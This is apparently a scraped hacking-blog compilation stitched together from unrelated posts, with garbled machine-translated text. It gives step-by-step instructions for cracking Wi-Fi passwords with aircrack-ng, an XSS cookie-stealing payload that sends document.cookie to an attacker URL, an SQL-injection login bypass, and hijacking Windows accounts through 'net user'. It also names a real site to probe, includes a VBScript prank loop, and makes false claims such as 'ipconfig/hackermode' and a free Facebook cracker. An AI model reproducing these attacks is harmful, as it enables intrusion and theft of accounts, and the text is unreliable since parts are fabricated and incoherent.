Here I am posting 21 program scripts which are helped in create a virus using notepad. Some of them will works on windows xpand. some of them in windows 7
Virus is a small infectious agent that reform only in cells of other living organisms . The virus can infect all kinds of life forms , animals and plants to bacteria and antiques .
[ 1 ]
From
1892 paper describing Dmitry Ivanovski and without bacterial pathogen
infects plants snuff and snuff discovery Beijerinckem Martinus mosaics
from the 1898 virus description
[ 2 ] about 5,000 viruses in detail
[ 3 ] , even though there are millions of types different .
[ 4 ] virus is present in almost every ecosystem on Earth and are the most abundant type of biological entity .
[ 5 ]
The word is from the Latinvirus referring to poison and other noxious substances, first used in English in 1392
[ 6 ] It is well known that the study of viruses and virus less in microbiology .
Virus
particles ( known as virions ) consist of two or three parts : i)
genetic material DNA or RNA molecules that are all genetic information ,
b ) the protein coat that protects these genes , and in some cabinets c
) protein and fat wrap bed , in which the cell . Forms of the virus in
the range of one helical and icosahedral forms complex structures . The
virus is about half a percent of the average amount of bacteria . The
Most viruses are too small to be seen directly with a light microscope .
Most
of the viruses are in evolutionary history of life is unclear : some
may have evolved from plasmids pieces of DNA that can move between cells
, while others may have arisen from bacteria . In evolution , viruses
are an important means of horizontal gene transfer , which increases
genetic diversity . Considered
[
7 ] of some viruses is a way of life , because they make the genetic
material and reproduce and evolve through natural selection . However,
they lack important features ( for example , cell structures ) , which
is generally regarded as essential to life . Because it is a number ,
but is describing , not all of the elements , and viruses , and " living
on the edge of life " .
Check this this website vulnerability yes or no, Put ' in the end of Url Like
Step 1
=> http://www.morephotosradio.com/transcript.php?interview_id=2021'
If your internet is slower than usual, then you should check if someone has hacked in your WIFI .In this post I’m going to show you two effective way to check this.
The easiest way is by using free utility called Wireless Network Watcher v1.55 .
1) Go to nirsoft.net and download Wireless Network Watcher v1.55.
2) Install it on your pc and start
scanning. It scans your wireless network and displays the list of all
computers and devices that are currently connected to your network.
For every computer or device that is connected to your network, the
following information is displayed: IP address, MAC address, the company
that manufactured the network card, and optionally the computer name.
If you want to check if someone has hacked in your WIFI without installing any software then you should log in
your router . If anyone is connected to your network it will be shown
in your router security settings. You can log into your router, usually http://192.168.1.1 . You can check your router ip address using command prompt
1) Run command prompt (cmd)
In this tutorial i will teach you to find Ip Address
of any website using Command Prompt or in short CMD. Using IP Address
you can find location of the website server and do more stuff. I will
demostrate this tutorial with Google but you can use this method to find
IP Address of any website like twitter, facebook etc. So lets get
started.
Dear BestHacking readers today I am going to tell you How To Use Mobile Camera As A WebCam
Step1:- Install Windows [EXE] (SmartCam.exe on your PC and Install)
Step2:- Install Smartcam on your Mobile (Symbian S60 2nd Edition
[SIS], S60 2nd Edition, JME [JAR], Windows Mobile [CAB], Android [APK]
Step3:- Start up SmartCam on your PC and go to >>> File
>>> Settings and check your connection and proceed >>>
next step.
Dear BestHacking readers today I am going to tell you How to Remove a Virus Using Command Prompt
Virus is a computer program that can copy itself and infect your
computer. These viruses can spread via USB/flash drive or from one
computer to other computer by few written codes. There are many
antivirus software available to remove viruses from computer. But there
are some viruses or suspicious files which can’t be removed by any
antivirus software.
Some suspicious files such as autorun.inf initiate
all the viruses in pc. These files must be removed for safe operation of
your pc, because they may lead to data loss, software
Secret Hack codes are those codes
which are usually hidden from users for any misuse and exploit. As we
all know android is very new platform and thus very few hack codes of androids are there on internet. Today i am sharing all the hack codes of androids cellphones
that i know. And i surely hope you can't find codes better than that.
So friends let's hack and explore our android Phones. I have tested
these codes on my Phone Samsung Note having an Android OS version 2.2. I am sure these will work on all previous versions.
Secret Hacking codes for Android Mobile Phones:
1. Complete Information About your Phone
*#*#4636#*#*
This code can be used to get some interesting information about your phone and battery. It shows following 4 menus on screen:
Hi Guys, I am back with another amazing hacking tutorial. I hope you are learning well from my other posts. In this post I will be teaching you How to Hack a Wi-Fi password. The following post will teach you how to crack wifi passwords easily in minutes.
We strictly advise our readers to follow the tricks and tutorials
presented at How to Hack at their own risk. We are sharing this
knowledge for educational purpose only, well most of it! Blah Blah
blah..
Phew! Done with the formalities, now let us start with the Wi-FI cracking. But before starting the tutorial let me give you a small introduction to what Wi-Fi hacking is and what are the security protocols associated with it.
In a secured wireless connected the data on internet is sent via encrypted packets. These packets are secured with network keys. There are basically 2 types of security keys : WEP( Wireless Encryption Protocol) :This
is the most basic form of encryption. This has become an unsafe option
as it is vulnerable and can be cracked with relative ease. Although this
is the case many people still use this encryption. WPA( Wi-FI Protected Access) : This
is the most secure wireless encryption. Cracking of such network
requires use of a wordlist with common passwords. This is sort of brute
force attack. This is virtually uncrackable if the network is secured
with a strong password
So lets begin the actual Wifi Hacking tutorial! In order to crack wi-fi password, you require the following things : 1) A Desktop or Laptop having a Wireless Adapter 2)
Backtrack Live DVD : This DVD is used to boot into backtrack OS,
Backtrack OS is a hacking OS and will be used in my further hacking
tutorials that is why I am asking to download it. It can be downloaded at : Download Backtrack to hack wifi Passwords 3) Brain! ( The most important part)
These are the things you require now let us proceed with the steps to crack wifi passwords easily.
1) Download the Backtrack OS ISO image
and burn it to a DVD. Boot from that DVD ( Insert that DVD into CD-ROM
and restart your PC.) You will see backtrack starting. Choose “Backtrack
Default text version”. After that it will start executing some
commands. Wait till you see something like in the following screenshot :
You will see root@bt:’# , Type startx and hit enter.
The
color of the screen will be different as the screenshot is of the
earlier version of backtrack. You will get a red-black screen of
backtrack. Wait for few minutes, after it is done, you will get a
desktop like version of backtrack.
Now Open the Konsole from the taskbar, Click on the icon against the dragon like icon in the taskbar in the above screenshot.
You will have a Command Prompt like Shell.
2) Type airmon-ng and hit Enter. You will have a screen like this, note down the name of interface, in our case the the name is wlan0.
3) Now type ifconfig wlan0 down and hit enter. This command will disable your wireless adapter, we are doing this in order to change your MAC address.
3) Now type ifconfig wlan0 hw ether 00:11:22:33:44:55 and hit enter. This command will change your MAC address to 00:11:22:33:44:55 in order to hide your identity.
4) Now type airmon-ng start wlan0 and hit enter. This will start the network adapter in monitor mode. Note down the new interface name, it could be eth0or mon0 or something like that.
The above command has started our network adapter in monitor mode as mon0, note down this name.
5) After this type airmon-ng mon0 and hit enter Replace the mon0 with interface name you discovered in step 4. This command will show you the list of available networks. Press Ctrl+C to stop the airmon to search for more networds. Copy the BSSID of the wireless network which you want to hack.
In the above screenshot there is a list of available networks, Choose 1 network and note the BSSID andchannel of it.
6) Type airodump-ng -c channelno –bssid BSSIDN1 mon0 -w filenameand hit enter.
Replace channelno and BSSIDN1 with the data from step 5. Replace the
mon0 with network interface name from step 4. In place of filename write
anyname and do remember that. Better use filename itself.
This command will begin capturing the packets from the network. You
need to capture more and more packets in order to crack the wifi
password. This packet capturing is a slow process.
7)
To make the packet capturing faster, we will use another command. Open a
new shell, don’t close the previous shell. In new shell type aireplay-ng -1 0 -a BSSIDN1 -h 00:11:22:33:44:55 mon0and hit enter. Replace the BSSIDN1 with the data from step 5 and mon0 from step 4. This command will boost the data capturing process.
The -1 tells the program the specific attack we wish to use which in
this case is fake authentication with the access point. The 0 cites the
delay between attacks, -a is the MAC address of the target access point,
-h is your wireless adapters MAC address and the command ends with the
your wireless adapters device name.
8) Now wait for few mins, let the DATA in the other console reach a count of 5000.
The data in above screenshot is 1, wait for that to reach 5000.
9) After it reaches 5000, open another console and type aircrack-ng filename-01.cap and hit enter. Replace the filename with the name you used in step 6. Add -01.cap to it. .cap is the extension of file having captured data packets.
After typing this command, aircrack will start trying to crack the
Wi-FI password. If the encryption used is WEP, it will surely crack the
password within few minutes.
In case of WPA use the following command instead of the above aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b BSSIDN1 filename-01.cap
Replace
BSSIDN1 and filename with data you
used. /pentest/wireless/aircrack-ng/test/password.lst is the address of a
file having wordlist of popular passwords. In case of WPA aircrack will
try to brute force the password. As I explained above that to crack WPA
you need a file having passwords to crack the encryption. If you are
lucky enough and the network owner is not smart enough, you will get the
password.
I hope that you will get what
I have explained above, to make the explanation even more clear, I have
made a sample video for you guys. I hope you will love this video,
Unlock this video by liking/tweeting or following us on Google+ :
Well that is all for this Wi-Fi Cracking Tutorial. I hope now you will know how to hack a wifi password easily.
If you have any queries regarding How to Crack a wifi password easily then do leave your queries in comments, also do leave your feedback about this amazing wifi hacking tutorial. Do read about How to hack wifi password on iPhone here at xomold.com.
Find a vulnerable site where you can post content. A message board is a good example. Remember, if the site is secure then this will not work.
Ad
2
Go to create a post. You will need to type some special code into the “post” which will capture the data of all who click on it.
You’ll want to test to see if the system filters out code. Post
<script>window.alert(“test”)</script>
If an alert box appears when you click on your post, then the site is vulnerable to attack.
3
Create and upload your cookie catcher.
The goal of this attack is to capture a user’s cookies, which allows
you access to their account for websites with vulnerable logins. You’ll
need a cookie catcher, which will capture your target’s cookies and
reroute them. Upload the catcher to a website you have access to and
that supports php. An example cookie catcher code can be found in the
sample section.
4
Post with your cookie catcher.
Input a proper code into the post which will capture the cookies and
sent them to your site. You will want to put in some text after the code
to reduce suspicion and keep your post from being deleted.
An example code would look like <iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
5
Use the collected cookies. After this, you can use the cookie information, which should be saved to your website, for whatever purpose you need.
Method 2 of 3: Executing Injection Attacks
1
Find a vulnerable site.
You will need to find a site that is vulnerable, due to an easily
accessible admin login. Try searching Google for admin login.asp.
2
Login as an admin. Type
admin as the username and use one of a number of different strings as
the password. These can be any one of a number of different strings but a
common example is 1’or’1’=’1.
3
Be patient. This is probably going to require a little trial and error.
4
Access the website.
Eventually, you should be able to find a string that allows you admin
access to a website, assuming the website is vulnerable to attack.
Method 3 of 3: Setting Up for Success
1
Learn a programming language or two. If you want to really learn how to hack websites, you’ll need to understand how computers
and other technologies work. Learn to use programming languages like
Python or SQL, so that you can gain better control of computers and
identify vulnerabilities in systems.
2
Have basic HTML literacy.
You will also need to have a really good understanding of html and
javascript if you want to hack websites in particular. This can take
time to learn but there are lots of free ways to learn on the internet, so you will certainly have the opportunity if you want to take it.
3
Consult with whitehats.
Whitehats are hackers who use their powers for good, exposing security
vulnerabilities and making the internet a better place for everyone. If
you’re wanting to learn to hack and use your powers for good or if you
want to help protect your own website, you might want to contact some current whitehats for advice.
ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations•
ASSOCIAT One step file association
ATTRIB Change file attributes
b
BCDBOOT Create or repair a system partition
BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info
c
CACLS Change file permissions
CALL Call one batch program from another•
CD Change Directory - move to a specific Folder•
CHANGE Change Terminal Server Session properties
CHKDSKCheck Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen•
CLUSTER Windows Clustering
CMD Start a new CMD shell
CMDKEY Manage stored usernames/passwords
COLOR Change colors of the CMD window•
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location•
CSCcmd Client-side caching (Offline Files)
CSVDE Import or Export Active Directory data
d
DATE Display or set the date•
DEFRAG Defragment hard drive
DEL Delete one or more files•
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevConDevice Manager Command Line Utility
DIR Display a list of files and folders•
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DISKPART Disk Administration
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSACLs Active Directory ACLs
DSAdd Add items to active directory (usergroupcomputer)
DSGet View items in active directory (usergroupcomputer)
DSQuery Search for items in active directory (usergroupcomputer)
DSMod Modify items in active directory (usergroupcomputer)
DSMove Move an Active directory Object
DSRM Remove items from Active Directory
e
ECHO Display message on screen•
ENDLOCAL End localisation of environment changes in a batch file•
ERASE Delete one or more files•
EVENTCREATE Add a message to the Windows event log
EXIT Quit the current script/routine and set an errorlevel•
EXPAND Uncompress files
EXTRACT Uncompress CAB files
f
FC Compare two files
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR /F Loop command: against a set of files•
FOR /F Loop command: against the results of another command•
FOR Loop command: all options Files, Directory, List•
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations•
g
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line•
GPUPDATE Update Group Policy settings
h
HELP Online Help
i
iCACLS Change file and folder permissions
IF Conditionally perform a command•
IFMEMBER Is the current user in an NT Workgroup
IPCONFIGConfigure IP
k
KILL Remove a program from memory
l
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer
LOGMAN Manage Performance Monitor
LOGOFF Log a user off
LOGTIME Log the date and time in a file
m
MAPISEND Send email from the command line
MBSAcli Baseline Security Analyzer.
MEM Display memory usage
MD Create new folders•
MKLINK Create a symbolic link (linkd)
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another•
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXECMicrosoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MV Copy in-use files
n
NET Manage network resources
NETDOM Domain Manager
NETSH Configure Network Interfaces, Windows Firewall & Remote access
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights
o
OPENFILES Query or display open files
If you have reason to access a computer without an account, you'll need to navigate to the "Safe Mode
with Command Prompt" and change the password. You should then be able
to restart the computer and enter the new password for the account you
hacked. This method only works for Windows operating systems.
Ad
Steps
1
Turn on the Computer.
Ad
2
Before it shows the Windows Logo, start repeatedly pressing the F8 key.
3
Use the up/down keys to navigate your way to "Safe Mode with Command Prompt" and press enter.
(After this the screen will appear dark and will show a bunch of
computer codes. Don't be afraid, this will only go on for a little
while. Just make sure no one else comes in when the screen is like
that).
Then it will go to the account/login screen
4
Notice there will be a new account called "Administrator".
5
Click on it and then you"ll go to "Safe mode Command Prompt".
6
If you know how to change a password using CMD (command prompt), then do it. If not, then type in Net User.
7
After this, it will show all the accounts on that computer. Pick which one you want to hack.
Let's say on that computer the accounts are named Bob, Nate, and Pat. If you pick Bob then simply type in:net user Bob *
After this it will tell you to type a new password
When you are typing, it will appear as if you aren't typing
anything. Don't worry, this is for security reasons. Just make SURE that
you spell it correctly.
8
Confirm the password. After you are finished it will ask you to confirm the new password.
After this shutdown the computer and then start it up again.
9
Find the account that you hacked and enter the new password.
10
Congrats! you have hacked a windows account! Have fun!
ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations•
ASSOCIAT One step file association
ATTRIB Change file attributes
b
BCDBOOT Create or repair a system partition
BOOTCFG Edit Windows boot settings
Our most popular information security and hacking training goes in-depth into the techniques used by malicious, black hat hackers with attention getting lectures and hands-on lab exercises
This amazing Facebook hacking software,
Facebook Hacker Pro has been designed by keeping in mind the needs of
the average wana-be Facebook hacker, an easy, fact and cost effective
method to gain access to lost or forgotten Facebook account passwords.
This Facebook Hacking program will enable you to crack Facebook
passwords of your choice. The only thing you need to know in order to
hack a Facebook account password is the user's Facebook profile link
witch is publicly available. This Facebook cracking tool is the fastest
and easiest way to hack Facebook Passwords you will find on the
Internet. And best of all, it's 100% free for a limited time only!.
HACK WIFI PASSWORD USING CMD
1 Go to Start. In the search box, type in "cmd". If your Start menu has the Run command, click Run and type "cmd" in the field.
2 Type"ipconfig" using the cursor.
3 Hit Enter. On your screen, you will see a series of names and
numbers. Look for the line that says Default Gateway. Write down the
number that you see next to Default Gateway
4 Navigate to Google or another search engine. In the address bar, type in the number that you just wrote down.
5 Hit Enter. You will see another screen that has fields to enter your
username and password. The username is "admin", and the password is
either "admin" or "1234". Enter that information into the appropriate
fields. Click the "Log In" button.
6 Go to the Wireless tab on
the website that pops up. If you scroll down, you should find something
called password. Write down your password and put it in a safe place in
case you forget it again.
You have also
In cmd write
ipconfig/hackermode and press enter....u wil get two options 1 and 2
press 1 and automatically d wifi password wil be save in ur desktop as a
txt file...try it
The
following lessons and workbooks are open and publicly available under
the terms and conditions of ISECOM. To understand our conditions or
purchase a license for commercial use, visit the LICENSE section of this website.
The HHS Project is a learning tool and
as with any learning tool, the instruction is the influence of the
instructor and not the tool. ISECOM cannot accept responsibility for how
any information herein is applied or abused.
The HHS Project is an open community
effort and if you find value in this project, we do ask you support us
through the purchase of a license, a donation, or sponsorship.
ေအာက္ကCodeေတြကို notepad ေပၚတင္ပါမေၾကာက္ပါနဲ႕
အေသးစားေလးေတြပါ။မိမိကိုယ္တိုင္ဖြင့္မွ ပြင့္ႏိုင္မယ့္ program ေလးေတြပါ။
1-သင့္ CD Drive
ကိုဆက္တိုက္ပြင့္ေနပါလိမ့္မယ္။ဖြင့္လိုက္ပိတ္လိုက္ေပါ့။ code:
Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs =
oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to
colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0
to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If